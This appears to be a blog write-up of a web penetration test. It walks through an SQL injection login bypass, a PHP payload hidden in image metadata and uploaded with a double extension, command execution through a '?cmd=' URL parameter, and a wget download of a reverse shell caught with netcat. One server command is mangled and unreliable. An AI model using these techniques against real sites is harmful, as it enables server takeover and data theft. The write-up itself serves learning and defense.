I recently cam across a penetration test that taught me how to perform SQL Injection and Command execution respectively. The site’s login page wasn’t filtering request properly which gave me room to perform SQLI and once the SQLI was executed in the login page, it triggered a redirect to the upload page where i was able to upload an image with a malicious code which aided me to perform Command execution which later allowed me to upload a reverse shell on the server.
SQL injection is a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution
OS command injection (also known as shell injection) is a web security vulnerability that allows an attacker to execute arbitrary operating system (OS) commands on the server that is running an application, and typically fully compromise the application and all its data.
Attack setup and Components
SQL Injection commands – Is used to test if the site is vulnerable to sql injection
SQL map – Is used to automate automates the process of detecting and exploiting SQL injection flaws and taking over of database servers
PayloadsAllthethings – Contains different kind of payload
Image – used to carry the payload
Exiftool – is is used for manipulating,metadata of an image files
Payload – you insert the payload into the image which is going to be uploaded in the server to get a command injection
Python3 – used to setup a server in the local host.
Php-reverse-shell – to give me access to the server
Attack Work Flow
I started by access the website login page, where I tested first if the website was vulnerable or not, I had intercepted the request using burp suite and had sent it to repeater where I edited the login field with SQL injection commands and sent it to the server where I confirmed indeed the website was vulnerable to SQL injection.
I went and picked up sqlmap to help me attack the vulnerable website and see if the tool would be able to dump any databases or usernames and passwords etc.
After going through sqlmap’s result I found out there was a filter that sqlmap was using which bypasses the login page and redirects the attacker to the upload page.
I went to payloadsallthething and used the first filter to see if it would bypass the filter mechanism of the website and see If I could get access to the upload page as sqlmap suggested
I executed the payload on the login page and indeed I got access to the upload page of the website and here is where the fun part begins.
I downloaded an image from google and used exiftool to insert the payload in to the image file.
The payload was successfully injected in the image file. The next step was to upload the image to the website.
I uploaded the image but before sending it directly to the server I had intercepted the request in burpsuite and changed the extension of the image and added .php between the file name and extension and then sent it to the website.
The image had successfully uploaded into the server as shown in the image below.
After that I went and executed the payload from the url ip/images/uploads/babydaddy.php.jpg?cmd=ls, and managed to get code execution in the server. Next I had to see if the server had the command which wget helps us to download resources and fortunately for me it was there.
Next was to start up a server on my localhost which was achieved by typing the command php3 -m httpss.server then went back to the URL and uploaded the shell by typing the command IP/images/uploads/babydaddy.php.jpg?cmd=wget myip:port/php-reverse-shell.php. once the upload was successful I had to now connect to the server by executing the reverse shell by using the following command ip/images/uploads/php-reverse-shell.php.
I opened up netcat and set up a listener, once the listener was up and running I executed the shell from the server and connected to my listener on my local host as show below
And finally I managed to get a shell in the target web server.
Black hat hackers tend to look for such vulnerabilities and exploit them, such exploits might cause reputational or financial damage to your organization if found by a black hat hacker hence always try your level best to have regular penetration test on your organization to look for such vulnerabilities and patch them.